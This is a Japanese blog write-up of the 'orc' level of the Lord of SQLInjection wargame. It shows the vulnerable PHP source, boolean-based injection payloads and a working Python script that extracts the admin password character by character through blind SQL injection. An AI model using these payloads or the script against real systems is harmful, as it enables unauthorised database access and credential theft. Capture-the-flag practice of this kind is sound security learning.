はまやんはまやんはまやん

hamayanhamayan's blog

orc [LORD OF SQLINJECTION]

Lord of SQLInjection

<?php
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
$query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello admin</h2>"; 

$_GET[pw] = addslashes($_GET[pw]); 
$query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc"); 
highlight_file(__FILE__); 

特徴は以下。

  • 前半でユーザー存在検証、後半でパスワード検証をしている
  • 後半ではaddslashesによるサニタイズと応答passwordが同じかの比較をしている
    • 後半を崩すのは大変そうだ
  • 前半は特に何もされていない

後半を崩すのは難しそうなので、パスワードを解析する必要がありそうだ。
前半は好きにできそうなので、Blind SQL Injectionをする。

Blind SQL Injection

' or id = 'admin' and {md} <= length(pw) #これを使ってパスワードの全長を解析しよう。
自分の場合は8だった。

' or id = 'admin' and {md} <= ascii(substr(pw,{i+1},1)) #
後半でasciiとsubstrを使ってある文字のバイナリ値を取得している。
この値を二分探索で特定して、一文字ずつ探し当てていこう。

import requests

url = "https://los.rubiya.kr/chall/orc_[yoururl].php"
cookie = {'PHPSESSID': '[PHPSESSID]'}

def check(data) -> bool:
    return "Hello admin" in data

ok = 0
ng = 30

while ok + 1 != ng:
    md = (ok + ng) // 2
    q = f"' or id = 'admin' and {md} <= length(pw) #"
    res = requests.get(url, params={'pw': q}, cookies=cookie)
    print(f"[+] try {md}")
    if check(res.text):
        ok = md
    else:
        ng = md

length = ok
print(f"[*] length = {length}")

ans = ""
for i in range(0, length):
    ok = 0
    ng = 127

    while ok + 1 != ng:
        md = (ok + ng) // 2
        q = f"' or id = 'admin' and {md} <= ascii(substr(pw,{i+1},1)) #"
        res = requests.get(url, params={'pw': q}, cookies=cookie)
        print(f"[+] try {md}")
        if check(res.text):
            ok = md
        else:
            ng = md

    ans += str(chr(ok))
    print(f"[*] {ans}")

print(f"[*] find! {ans}")